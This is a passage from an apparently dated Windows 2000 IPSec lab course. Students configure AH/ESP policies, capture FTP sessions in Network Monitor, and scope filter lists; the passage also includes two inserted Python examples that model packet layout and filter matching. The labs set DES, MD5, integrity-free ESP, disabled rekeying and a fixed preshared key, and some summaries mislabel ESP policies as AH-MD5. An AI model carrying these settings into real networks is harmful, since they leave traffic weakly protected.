2. Open your ipsec.mmc.msc console. Right-click the 3_REQUEST_ESP(des)_only policy, and choose Un-assign.
3. Create another IP Security Policy. Click Next.
4. For the IP Security Policy Name, enter 4_REQUIRE_ESP(des)_only, and click Next.
5. Uncheck Activate The Default Response Rule, and click Next.
6. Uncheck Edit Properties, and click Finish.
7. Double-click the new policy.

8. On the Rules tab, verify that Use Add Wizard is unchecked, and click Add.
9. On the IP Filter List tab, click the radio button for All IP Traffic.
10. Switch to the Filter Action tab.
11. Click the radio button for Require Security.
12. Click Edit.
13. Leave the radio button for Negotiate Security selected.
14. Remove all but one method by holding the Shift key, selecting all but one of the choices, and clicking Remove. Some configurations may have only one option. If so, skip the next step.
15. When prompted with Are You Sure?, click Yes.
16. Select the remaining method, and click Edit.
17. Under Security Method, select Custom. Click the Settings button found under Custom (For Expert Users), and make sure that AH is unchecked.
18. Verify that ESP is checked.
19. Leave ESP's integrity algorithm set to <None>.
20. For Encryption Algorithm, select DES.
21. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.
22. Click OK three times to return to the Rule Properties.
23. Switch to the Authentication Methods tab.
24. Click Edit.
25. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
26. Click OK, and click Close twice to end the policy modification.

Configuring a Require ESP IPSec Session

You have configured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the MD5 algorithm; Student_Q also will only respond using this algorithm.

The following task covers several situations. First, there will be a mismatch between the two hosts, as Student_P and Student_Q are using different forms of IPSec. Then, both hosts will use the same implementation, and the session will be analyzed in Network Monitor.

The mismatch part will not be successful because Student_Q's policy is designed to demand IPSec. If a remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will not fall back to regular, insecure IP. As you saw before, a substantial delay will occur because Student_Q is trying to establish an IPSec communication with Student_P. Finally, once ESP is used on both ends of the communication, you will see that there is no difference with respect to the negotiation process, there is no difference with respect to the encryption of all subsequent information, and so forth. Once ISAKMP establishes the encryption algorithms between the two machines, as far as an eavesdropper is concerned, there will be nothing but binary garbage beyond the IP header.

TASK 2D-6

Require-and-Respond ESP Implementation and Analysis

Note: Perform the following step only if you are designated as Student_Q.

1. In your ipsec.mmc.msc console, right-click the 4_REQUIRE_ESP(des)_only policy, and choose Assign. Close the console.

Note: Perform step 2 through step 5 only if you are designated as Student_P.

2. At the command prompt, again enter ftp IP_address_of_Student_Q.
3. After a substantial delay, observe that you cannot ftp to Student_Q. In fact, you should receive a message indicating that the connection has timed out. Enter quit to stop the ftp attempt.
4. Open your ipsec.mmc.msc console. Right-click the 3_RESPOND_ESP(des)_only policy, and choose Assign.
5. Close the console.

Note: Perform the following step only if you are designated as Student_Q.

6. Start Network Monitor, and start a capture.

Note: Perform step 7 through step 10 only if you are designated as Student_P.

7. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.
8. Log on as anonymous with no password.
9. Enter dir to see a list of files hosted on the ftp site.
10. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

11. In Network Monitor, stop and view the capture.
12. Observe that these captures are exactly the same as when the 3_REQUEST_ESP(des)_only and the 3_RESPOND_ESP(des)_only policies were in force earlier.
13. Close Network Monitor, saving the capture if you like.

Topic 2E

Combining AH and ESP in IPSec

You have configured and analyzed IPSec traffic by using AH, and IPSec traffic by using ESP. In this topic, you will configure and analyze network traffic that combines AH and ESP. When you are using both AH and ESP, you are configuring IPSec to its fullest strength.

TASK 2E-1

Creating the 5_REQUEST_AH(md5)+ESP(des) IPSec Policy and the Response Policy

Note: Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.

1. Open your ipsec.mmc.msc console. In the right pane, unassign the 4_REQUIRE_ESP(des)_only policy, and then create another IP Security Policy. Click Next.
2. For the IP Security Policy Name, enter 5_REQUEST_AH(md5)+ESP(des), and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, and click Add.
7. On the IP Filter List tab, click the radio button for All IP Traffic.
8. Switch to the Filter Action tab.
9. Click the radio button for Request Security (Optional).
10. Click Edit.
11. Leave the radio button selected for Negotiate Security.
12. Read the options presented to you under Security Method Preference Order.
13. Remove all but one method by holding the Shift key, selecting all but one of the choices, and clicking Remove. Some configurations might have only one option. If so, skip the next step.
14. When prompted with Are You Sure?, click Yes.
15. Select the remaining method, and click Edit.
16. Under Security Method, click the Settings button found under Custom (For Expert Users).
17. Verify that AH is checked.
18. Select the integrity algorithm MD5.
19. Verify that ESP is checked.
20. Leave ESP's integrity algorithm set to <None>.
21. For Encryption Algorithm, select DES.
22. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.
23. Click OK three times to return to the Rule Properties.
24. Switch to the Authentication Methods tab.
25. Click Edit.
26. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
27. Click OK, and then click Close to return to the Policy Properties.
28. On the Rules tab, check <Dynamic> Default Response, and click Edit. The Use Add Wizard check box should remain unchecked.
29. Under Security Methods, hold the Shift key, select all but one of the choices, and click Remove.
30. Select the remaining method, and click Edit.
31. Under Security Method, click the Settings button found under Custom (For Expert Users).
32. Verify that AH is checked.
33. Select the integrity algorithm MD5.
34. Verify that ESP is checked.
35. Leave ESP's integrity algorithm set to <None>.
36. For Encryption Algorithm, select DES.
37. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.
38. Click OK twice to return to the Rule Properties.
39. Switch to the Authentication Methods tab.
40. Click Edit.
41. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
42. Click OK twice, and then click Close to exit the Policy Properties.
43. Close the console without saving settings.

Configuring the IPSec Response

You have configured a policy where Student_Q will request other computers that attempt to communicate with it to implement AH by using the MD5 integrity algorithm and ESP by using the DES encryption algorithm; Student_Q is also in a position to respond by using this algorithm. Let's configure Student_P to follow Student_Q's lead.

TASK 2E-2

Creating the 5_RESPOND_AH(md5)+ESP(des) IPSec Policy

Note: Perform this task only if you are designated as Student_P. Student_Q is advised to follow along.

1. Open your ipsec.mmc.msc console. In the right pane, unassign the 3_RESPOND_ESP(des)_only policy, then create another IP Security Policy. Click Next.
2. For the IP Security Policy Name, enter 5_RESPOND_AH(md5)+ESP(des), and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, check <Dynamic> Default Response, and click Edit.
7. Remove all but one security method by holding the Shift key, selecting all but one of the choices, and clicking Remove.
8. When prompted with Are You Sure?, click Yes.
9. Select the remaining method, and click Edit.
10. Under Security Method, click the Settings button found under Custom (For Expert Users).
11. Verify that AH is checked.
12. Select the integrity algorithm MD5.
13. Verify that ESP is checked.
14. Leave ESP's integrity algorithm set to <None>.
15. For Encryption Algorithm, select DES.
16. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.
17. Click OK twice to return to the Rule Properties.
18. Switch to the Authentication Methods tab.
19. Click Edit.
20. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
21. Click OK twice, and then click Close to close the Policy Properties.
22. Close the console without saving settings.

AH and ESP IPSec Session Analysis

You have just gone through the steps of configuring IPSec on both Student_P and Student_Q. In the next task, you will initiate a communication between the two hosts, and analyze the communication in Network Monitor.

The initial communication will be an attempt at using FTP. As with the 1_REQUEST_AH(md5)_only and 3_REQUEST_ESP(des)_only policies, this transaction is also successful between Student_P and Student_Q because Student_Q's policy is designed to request, not demand, IPSec. If a remote machine trying to communicate with Student_Q is not IPSec-aware or does not have a policy assigned to do so, then Student_Q will fall back to regular, insecure IP. The brief delay occurs because Student_Q is trying to establish an IPSec communication with Student_P. Once the connection is made, the second computer will be configured to respond to the first properly.

During the session analysis, try to note the differences from the earlier captures, those resulting from the AH_only and ESP_only policies. Here, you are not able to see any of the TCP flags, connection setup, three-way handshake completion, or data transfer; in fact, you will see nothing but encrypted stuff! The protocol is listed simply as ESP. If you check the details within the IP header, IP points to AH (IP protocol ID 51, 0x33) and AH points to ESP (IP protocol ID 50, 0x32). After the IP header is AH/ESP. Nobody but these two endpoints can decrypt packets destined for them.

TASK 2E-3

Configuring and Analyzing an IPSec Session Using AH and ESP

Note: Perform step 1 through step 2 only if you are designated as Student_Q.

1. Open your ipsec.mmc.msc console. Right-click the 5_REQUEST_AH(md5)+ESP(des) policy and choose Assign. Close the console.
2. Start Network Monitor, and start a capture.

Note: Perform step 3 through step 7 only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q after a very brief delay, even though an IPSec policy is assigned on Student_Q.
4. Log on as anonymous with no password.
5. Enter dir to see a list of files hosted on the ftp site.
6. Exit the ftp session.
7. Open your ipsec.mmc.msc console. Right-click the 5_RESPOND_AH(md5)+ESP(des) policy, and choose Assign.

Note: Perform step 8 through step 10 only if you are designated as Student_Q.

8. In Network Monitor, stop and view the capture.
9. Observe the session between the two hosts.
10. Start a new capture (save the previous capture if you like).

Note: Perform step 11 through step 14 on Student_P.

11. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.
12. Log on as anonymous with no password.
13. Enter dir to see a list of files hosted on the ftp site.
14. Exit the ftp session.

Note: Perform step 15 through step 22 only if you are designated as Student_Q.

15. In Network Monitor, stop and view the capture.
16. Observe that, after the ARP resolution has taken place (in frames 1 and 2), Student_P attempts to initiate a three-way handshake with Student_Q (in frame 3).
17. Observe that, when the policy on Student_Q says to request IPSec communication, Student_Q begins the negotiation process (in frame 4) by using the ISAKMP protocol (UDP port 500).
18. Observe that, when Student_P agrees to comply (in frame 5), there is an ISAKMP interplay between the two machines for the next few frames to negotiate and establish the IPSec protocol.
19. Observe that the actual three-way handshake is now completed in frames 14 and 15.
20. Search the packets, and try to look for the name of the text file in response to the dir (LIST) command.
21. Observe that, from frame 14 onward until the session teardown, AH ensures integrity and ESP ensures confidentiality of communication between the two machines.
22. Close Network Monitor. You can save your capture to a file if you like.

Note: Perform the following step only if you are designated as Student_P.

23. Open your ipsec.mmc.msc console, unassign the 5_RESPOND_AH(md5)+ESP(des) policy, and close the console.

Requiring AH and ESP in an IPSec Session

Again, let's modify the situation a bit. You'll configure Student_Q to demand IPSec of other computers by using the Require policy instead of the Request policy. From Student_P, you'll attempt to communicate with Student_Q and fail. You'll then reassign the Respond policy on Student_P, so that you are able to establish communications with Student_Q.

TASK 2E-4

Creating the 6_REQUIRE_AH(md5)+ESP(des) IPSec Policy

Note: Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.

1. Open your ipsec.mmc.msc console, and unassign the 5_REQUEST_AH(md5)+ESP(des) policy.
2. Create another IP Security Policy. Click Next.
3. For the IP Security Policy Name, enter 6_REQUIRE_AH(md5)+ESP(des), and click Next.
4. Uncheck Activate The Default Response Rule, and click Next.
5. Uncheck Edit Properties, and click Finish.
6. Double-click the new policy.
7. On the Rules tab, verify that Use Add Wizard is unchecked, and click Add.
8. On the IP Filter List tab, click the radio button for All IP Traffic.
9. Switch to the Filter Action tab.
10. Click the radio button for Require Security.
11. Click Edit.
12. Leave the radio button selected for Negotiate Security.
13. If necessary, remove all but one security method.
14. Select the remaining method, and click Edit.
15. Under Security Method, click the Settings button found under Custom (For Expert Users).
16. Verify that AH is checked and that the integrity algorithm is set to MD5.
17. Verify that ESP is checked.
18. Leave ESP's integrity algorithm set to <None>.
19. For Encryption Algorithm, select DES.
20. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.
21. Click OK. If you receive an information box indicating that you are on a Medium security level, click OK to agree to it.
22. Click OK twice to return to the Rule Properties.
23. Switch to the Authentication Methods tab.
24. Click Edit.
25. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
26. Click OK to close the Authentication Methods.
27. Click Close twice to exit the Policy Properties.
28. Assign the new policy, and close the console without saving settings.

Using Mismatched AH and ESP IPSec Policies

You have configured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the MD5 algorithm; Student_Q also will respond only by using this algorithm. Now, let's see what happens when Student_P does not follow Student_Q's lead.

TASK 2E-5

Matching and Analyzing AH and ESP IPSec Policies

Note: Perform step 1 through step 2 only if you are designated as Student_Q.

1. Activate Network Monitor, and start a capture.
2. Monitor the network traffic between the Student_P and Student_Q machines, while the ftp session is attempted, and fails, due to mismatched policies.

Note: Perform step 3 through step 6 only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q.
4. Observe that, after a substantial delay, you are not able to ftp to Student_Q. In fact, you should receive a message stating that the connection has timed out.
5. Enter quit.
6. Open your ipsec.mmc.msc console. Right-click the 5_RESPOND_AH(md5)+ESP(des) policy and choose Assign. Close the console.

Note: Perform the following step only if you are designated as Student_Q.

7. Stop and view, then start a new capture.

Note: Perform step 8 through step 11 only if you are designated as Student_P.

8. At the command prompt, again enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.
9. Log on as anonymous with no password.
10. Enter dir to see a list of files hosted on the ftp site.
11. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

12. In Network Monitor, stop and view the capture.
13. Observe that these captures are exactly the same as when the 5_REQUEST_AH(md5)+ESP(des) and the 5_RESPOND_AH(md5)+ESP(des) policies were in force earlier.
14. Try to identify a difference in the negotiation process. There is no difference with respect to the negotiation process, there is no difference with respect to the encryption of all subsequent information, and so forth.
15. Examine the data beyond the IP header. Once ISAKMP establishes the encryption algorithms between the two machines, as far as an eavesdropper is concerned, there will be nothing but binary garbage beyond the IP header.
16. Close Network Monitor. You can save your capture to a file if you like.

Configuring All the Options

Now, let's step up the requirements for IPSec. Let's say you were paranoid and wanted to use all the features set to their highest security settings. You will configure an IPSec policy on Student_Q that will use the SHA-1 algorithm to ensure integrity and 3DES to ensure confidentiality. You will then configure Student_Q to demand IPSec of other computers. To do so, you will use a Require policy instead of a Request policy. Finally, on Student_P, you will implement a corresponding Respond policy and establish communications with Student_Q.

Someone may bring up the question, "Hey, why would you use the integrity algorithm twice?" At this point, we'll leave the answer as a smug "Because we can!" Actually, there is a more simplified explanation.

Most books on IPSec recommend using AH to ensure the integrity of the entire packet and ESP just for confidentiality of the payload. Most books on IPSec also simply say that ESP "...can also be used for integrity." Let's look at this a little more carefully.

The AH's function is to sign the entire packet, including the IP header. However, there are certain fields in the IP header that have to be excluded because they are designed to change. One example of this is when traversing a routed environment: the 8-bit TTL field will decrement by 1 at each hop. The values contained within these fields cannot be signed, as the received value would not match the value at origin.

The ESP's function is to encrypt and/or sign everything but the IP header. In Transport Mode, using ESP's signing functionality might be considered redundant when AH is around to do the job, especially when AH can sign even the IP headers (mostly). It's when IPSec is implemented in Tunnel Mode, as with a VPN solution, that ESP's signing functionality has some meaning over and above that of AH. In Tunnel Mode, there are two IP headers in each packet. The outer IP header is the one used by the tunnel endpoints to communicate with each other. Encapsulated within this as payload data is the IP header, IP protocol, and the actual data of the two hosts communicating end-to-end via the tunnel. Therefore, when the tunnel endpoints use ESP's integrity algorithm, the internal IP headers are treated as data and will be completely signed. By the way, before you get carried away with IPSec, it is also recommended that you read Bruce Schneier's excellent critique on IPSec. You can find it at his company's Web site, www.counterpane.com.
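The following is an added example, not part of the course text, that models what the Network Monitor analysis in Tasks 2E-3 and 2E-5 shows (IP pointing to AH, protocol 51, and AH pointing to ESP, protocol 50, with nothing readable beyond that) together with the mutable-field rule for AH described above: it builds IPv4 packets carrying AH and/or ESP, walks the protocol chain as a sniffer would, and computes AH's HMAC-MD5-96 integrity check value (RFC 2402/2403) with the TTL and the other mutable IP fields zeroed, so a router's TTL decrement does not break the check but a changed payload or source address does. The addresses, key and payload are constructed sample values, and the ESP body is an opaque stand-in rather than real DES-CBC output.

```python
"""Added example: IP/AH/ESP packet layout, the protocol chain an eavesdropper can
decode, and AH's ICV over the immutable fields. Sample values are constructed."""
import hashlib
import hmac
import struct

IPPROTO_TCP = 6
IPPROTO_ESP = 50   # 0x32: what the AH "next header" field points to
IPPROTO_AH = 51    # 0x33: what the IP "protocol" field points to
AH_LEN = 24        # 12-byte fixed header + 96-bit ICV
AH_KEY = b"constructed-key!"   # in practice derived by ISAKMP, never a literal


def ip_checksum(hdr):
    """Standard one's-complement checksum over a 20-byte IPv4 header."""
    total = sum(struct.unpack("!10H", hdr))
    total = (total >> 16) + (total & 0xFFFF)
    total += total >> 16
    return (~total) & 0xFFFF


def ipv4_header(src, dst, proto, total_len, ttl=128):
    src_b = bytes(int(o) for o in src.split("."))
    dst_b = bytes(int(o) for o in dst.split("."))
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0x4000,
                      ttl, proto, 0, src_b, dst_b)
    return hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]


def ah_icv(packet):
    """HMAC-MD5-96 over the whole packet, with every field a router may legitimately
    change (TOS, flags/fragment offset, TTL, header checksum) and the ICV field
    itself replaced by zeros before hashing, as RFC 2402 requires."""
    b = bytearray(packet)
    b[1] = 0                      # TOS
    b[6:8] = b"\x00\x00"          # flags + fragment offset
    b[8] = 0                      # TTL: decremented by 1 at each hop
    b[10:12] = b"\x00\x00"        # header checksum follows the TTL
    b[32:44] = bytes(12)          # ICV field inside the AH header
    return hmac.new(AH_KEY, bytes(b), hashlib.md5).digest()[:12]


def build_packet(src, dst, payload, use_ah=True, use_esp=True, spi=0x1000, seq=1):
    """IP[/AH][/ESP] packet. With use_esp the transport segment becomes an ESP
    header (SPI, sequence number) plus opaque bytes; the ESP trailer is omitted."""
    if use_esp:
        body = struct.pack("!II", spi, seq) + bytes(b ^ 0xA5 for b in payload)
        after_ah = IPPROTO_ESP
    else:
        body, after_ah = payload, IPPROTO_TCP
    ip_proto = IPPROTO_AH if use_ah else after_ah
    ah = b""
    if use_ah:
        # next header, length in 32-bit words minus 2, reserved, SPI, seq, ICV
        ah = struct.pack("!BBHII", after_ah, AH_LEN // 4 - 2, 0, spi, seq) + bytes(12)
    pkt = ipv4_header(src, dst, ip_proto, 20 + len(ah) + len(body)) + ah + body
    if use_ah:
        pkt = pkt[:32] + ah_icv(pkt) + pkt[44:]
    return pkt


def protocol_chain(pkt):
    """What a sniffer can decode: the protocol chain, and how many bytes after the
    last readable header stay opaque."""
    chain, proto, off = [], pkt[9], 20
    if proto == IPPROTO_AH:
        chain.append("AH")
        proto, off = pkt[off], off + (pkt[off + 1] + 2) * 4
    if proto == IPPROTO_ESP:
        chain.append("ESP")          # only SPI and sequence number are in clear
        return chain, len(pkt) - off - 8
    chain.append("TCP" if proto == IPPROTO_TCP else str(proto))
    return chain, 0


def verify_ah(pkt):
    return hmac.compare_digest(pkt[32:44], ah_icv(pkt))


def forward_one_hop(pkt):
    """Simulate a router: decrement TTL and recompute the header checksum."""
    hdr = bytearray(pkt[:20])
    hdr[8] -= 1
    hdr[10:12] = b"\x00\x00"
    hdr[10:12] = struct.pack("!H", ip_checksum(bytes(hdr)))
    return bytes(hdr) + pkt[20:]


if __name__ == "__main__":
    req = b"LIST\r\n"   # constructed stand-in for the FTP dir command
    both = build_packet("172.26.10.1", "172.28.10.1", req)
    print(protocol_chain(both))                 # (['AH', 'ESP'], 6)
    print(verify_ah(forward_one_hop(both)))     # True: TTL is outside the ICV
    print(verify_ah(both[:-1] + bytes([both[-1] ^ 1])))   # False: data changed
    print(protocol_chain(build_packet("172.26.10.1", "172.28.10.1", req, use_ah=False)))
```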

TASK 2E-6

Implementing the 7_REQUIRE_AH(sha)+ESP(sha+3des) Policy

Note: Perform this task only if you are designated as Student_Q. Student_P is advised to follow along.

1. Create another IP Security Policy. Click Next.
2. For the IP Security Policy Name, enter 7_REQUIRE_AH(sha)+ESP(sha+3des), and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, and click Add.
7. On the IP Filter List tab, click the radio button for All IP Traffic.
8. Switch to the Filter Action tab.
9. Click the radio button for Require Security.
10. Click Edit.
11. Leave the radio button selected for Negotiate Security.
12. If necessary, remove all but one security method.
13. Select the remaining method, and click Edit.
14. Under Security Method, click the Settings button found under Custom (For Expert Users).
15. Verify that AH is checked.
16. Select the integrity algorithm as SHA1.
17. Verify that ESP is checked.
18. Select ESP's integrity algorithm as SHA1.
19. For Encryption Algorithm, select 3DES.
20. Under the Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.
21. Click OK three times to return to the Rule Properties.
22. Switch to the Authentication Methods tab.
23. Click Edit.
24. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
25. Click OK, and then click Close twice to exit the Policy Properties.
26. Close the console without saving settings.

Configuring the AH-and-ESP IPSec Response Policy

In order for the two hosts to communicate, they must have compatible IPSec policies implemented. By now, you are familiar with the procedure, so the following task should be rather straightforward.

TASK 2E-7

Implementing the 7_RESPOND_AH(sha)+ESP(sha+3des) Policy

Note: Perform this task only if you are designated as Student_P. Student_Q is advised to follow along.

1. Create another IP Security Policy. Click Next.
2. For the IP Security Policy Name, enter 7_RESPOND_AH(sha)+ESP(sha+3des), and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, check <Dynamic> Default Response, and click Edit.
7. Remove all but one security method.
8. Select the remaining method, and click Edit.
9. Under Security Method, click the Settings button found under Custom (For Expert Users).
10. Verify that AH is checked.
11. Select the integrity algorithm as SHA1.
12. Verify that ESP is checked.
13. Select ESP's integrity algorithm as SHA1.
14. For Encryption Algorithm, select 3DES.
15. Under Session Key settings, verify that the two boxes for generating new keys for both time and size are unchecked.
16. Click OK twice to return to the Rule Properties.
17. Switch to the Authentication Methods tab.
18. Click Edit.
19. Click the radio button for Use This String To Protect The Key Exchange (Preshared Key), and in the box, enter Purple Enigma to provide the text for the preshared key.
20. Click OK twice, and then click Close to exit the Policy Properties.
21. Close the console without saving settings.

Implementing the Full IPSec Session

So far, you have configured a policy where Student_Q will require other computers that attempt to communicate with it to implement AH by using the SHA-1 algorithm and ESP by using both the SHA-1 and 3DES algorithms; Student_Q also will respond only by using this algorithm. Now, let's see what happens when Student_P follows Student_Q's lead. When you perform the final analysis in Network Monitor, keep the following in mind: If you were to perform a Hex-to-Hex comparison of the two captures, you would see that, due to the additional overhead imposed by the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy over the 6_REQUIRE_AH(md5)+ESP(des) policy, the actual number of bits is greater. In fact, if you had tried to actually transfer large files between the two machines, then the number of frames would have actually been greater.

TASK 2E-8

Implementing and Analyzing an AH(sha) and ESP(sha+3des) IPSec Session

Note: Perform step 1 through step 2 only if you are designated as Student_Q.

1. Open your ipsec.mmc.msc console. Assign the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy. When you assign this policy, the previously assigned policy is automatically unassigned.
2. Start Network Monitor, and start a capture.

Note: Perform step 3 through step 7 only if you are designated as Student_P.

3. Open your ipsec.mmc.msc console. Assign the 7_RESPOND_AH(sha)+ESP(sha+3des) policy.
4. At the command prompt, enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.
5. Log on as anonymous with no password.
6. Enter dir to see a list of files hosted on the ftp site.
7. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

8. In Network Monitor, stop and view the capture.
9. Observe that these captures are more or less the same as when the 6_REQUIRE_AH(md5)+ESP(des) and 5_RESPOND_AH(md5)+ESP(des) policies were in force earlier.
10. Identify any differences with respect to the negotiation process, encryption, or integrity algorithms.
11. Close Network Monitor. You can save your capture to a file if you like.

Using the Filter Lists

In all of the previous scenarios, we spent most of the time trying to figure out the effect of using various combinations of integrity and confidentiality algorithms. Once you have decided on a particular combination, you can also leverage the policy to explicitly secure network traffic, depending on network or host ID or protocol. You can do this by editing the filter list.

TASK 2E-9

Editing Filter Lists to Explicitly Secure Traffic

Note: Perform step 1 through step 18 only if you are designated as Student_Q.

1. From the Start menu, choose Settings→Network And Dial-up Connections.
2. Right-click the Classroom Hub interface, and choose Enable.
3. Ping the IP address of your nearest router. You should not be able to reach the router, as the IPSec policy on your machine is restrictive.
4. Open the ipsec.mmc.msc console and unassign the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy.
5. Double-click the policy 7_REQUIRE_AH(sha)+ESP(sha+3des).
6. On the Rules tab, under IP Security Rules, select All IP Traffic.
7. Click Edit.
8. Under IP Filter Lists, select All IP Traffic.
9. Click Edit.
10. Under Filters, observe that one rule is already included for you.
11. Select this rule and click Edit.
12. In the Filter Properties dialog box, observe the drop-down lists for Source Address and Destination Address.
13. For Source Address, select My IP Address, if necessary.
14. For Destination Address, select A Specific IP Address.
15. In the IP Address box, enter the specific IP address for Student_P (172.26.10.x or 172.28.10.x).
16. Leave Mirrored checked.
17. Click OK, and then click Close three times.
18. Right-click the policy 7_REQUIRE_AH(sha)+ESP(sha+3des), and choose Assign.

Note: Perform step 19 through step 24 only if you are designated as Student_P.

19. From the Start menu, choose Settings→Network And Dial-up Connections.
20. Right-click the Partner interface, and choose Properties.
21. Double-click Internet Protocol (TCP/IP).
22. Edit the IP address by adding 100 to the last octet. That is, if the IP address is 172.26.10.1, make it 172.26.10.101.
23. Click OK twice.
24. At a command prompt, enter ipconfig to verify the change in your IP address.

Note: Perform the next step only if you are designated as Student_Q.

25. Activate Network Monitor, and start a capture.

Note: Perform step 26 through step 29 only if you are designated as Student_P.

26. At the command prompt, enter ftp IP_address_of_Student_Q. You should be able to successfully ftp to Student_Q.
27. Log on as anonymous with no password.
28. Enter dir to see a list of files hosted on the ftp site.
29. Exit the ftp session, and close all open windows.

Now let's look at the captures in Network Monitor and see what was different from the previous capture.

Note: Perform the rest of this task only if you are designated as Student_Q. Student_P is advised to follow along and participate in any ensuing discussion.

30. In Network Monitor, stop and view the capture.
31. Observe that there is no ISAKMP negotiation, no ESP, and so forth.
32. Why did the supposedly secure Require IPSec policy allow Student_P to communicate with it in plaintext? When you added the specifications to the filter list, Student_Q looked to see if the specific IP address was in the IP header. It would apply IPSec policies only if its communication was with the specified machine. Because Student_P's IP address was changed, its IP header did not match that on the filter. So, insecure communication was allowed to take place.
33. Ping your nearest router. Are you able to ping the router? Why or why not? You are able to ping the router for the same reason as Student_P could communicate with Student_Q. What this means is that, if traffic between sensitive machines needs to be protected, you can modify the filter lists to do so. All other traffic to those same machines from other hosts will not be protected. It is up to you as the IPSec policy designer to come up with these schemes for your company.
34. Close Network Monitor and any other open windows.
35. Disable the Classroom Hub interface. The Partner interface should still be enabled.
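The following is an added example, not part of the course text, that models how the filter edited in steps 13 through 16 above (Source Address = My IP Address, Destination Address = A Specific IP Address, Mirrored) is matched against the addresses in the IP header, and why packets that match no filter are passed in clear even though the rule's action is Require Security. The addresses are classroom-style sample values (Student_Q at 172.28.10.1, Student_P at 172.26.10.1, a router at 172.28.10.254), and the matching logic is a simplified model of the behaviour the task describes, not the Windows 2000 implementation.

```python
"""Added example: address-scoped IPSec filter matching, including the Mirrored
option, and the clear-text fall-through for unmatched traffic. Sample values only."""
from ipaddress import ip_address, ip_network

MY_IP = ip_address("172.28.10.1")   # Student_Q (constructed sample address)


class IPFilter:
    def __init__(self, src, dst, mirrored=True):
        self.src, self.dst, self.mirrored = src, dst, mirrored

    @staticmethod
    def _addr_matches(spec, addr):
        if spec == "My IP Address":
            return addr == MY_IP
        if spec == "Any IP Address":
            return True
        return addr in ip_network(spec, strict=False)   # a host (/32) or a subnet

    def matches(self, src, dst):
        src, dst = ip_address(src), ip_address(dst)
        if self._addr_matches(self.src, src) and self._addr_matches(self.dst, dst):
            return True
        # Mirrored: the one filter also covers packets flowing the opposite way
        return self.mirrored and self._addr_matches(self.src, dst) \
            and self._addr_matches(self.dst, src)


def filter_action(filters, src, dst):
    """'require IPSec' if any filter in the list matches the packet's addresses;
    otherwise the rule does not apply at all and the packet is passed in clear."""
    return "require IPSec" if any(f.matches(src, dst) for f in filters) else "pass in clear"


if __name__ == "__main__":
    # Filter as edited in steps 13-16: My IP Address <-> Student_P's address, mirrored
    scoped = [IPFilter("My IP Address", "172.26.10.1")]
    print(filter_action(scoped, "172.26.10.1", "172.28.10.1"))     # require IPSec
    print(filter_action(scoped, "172.26.10.101", "172.28.10.1"))   # pass in clear (step 32)
    print(filter_action(scoped, "172.28.10.1", "172.28.10.254"))   # pass in clear (step 33)
    # The default All IP Traffic filter covers everything from or to this host
    everything = [IPFilter("My IP Address", "Any IP Address")]
    print(filter_action(everything, "172.28.10.1", "172.28.10.254"))   # require IPSec
```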

Using Certificates

Without going into the details of setting up a CA or obtaining IPSec certificates from a CA, we will see how easy it is to use a certificate for IPSec once you have it. An IPSec certificate contains all of the attributes and keys required to leverage the integrity and confidentiality functions of IPSec. We have created a certificate that you can use for this purpose.

Installing CAs and certificates was covered in detail in the prerequisite courses.

TASK 2E-10
Using Certificates for Authentication

Note: Perform step 1 through step 12 on all student computers.

1. In your ipsec.mmc.msc console, choose Console→Add/Remove Snap-in.
2. Click Add.
3. Click Certificates, and click Add.
4. Select the radio button for Computer Account, and click Next.
5. Click Finish, click Close, and then click OK.
6. Expand Certificates (Local Computer).
7. Expand Trusted Root Certification Authorities.
8. Right-click Certificates, and choose All Tasks→Import. The Certificate Import Wizard is displayed.
9. Click Next.
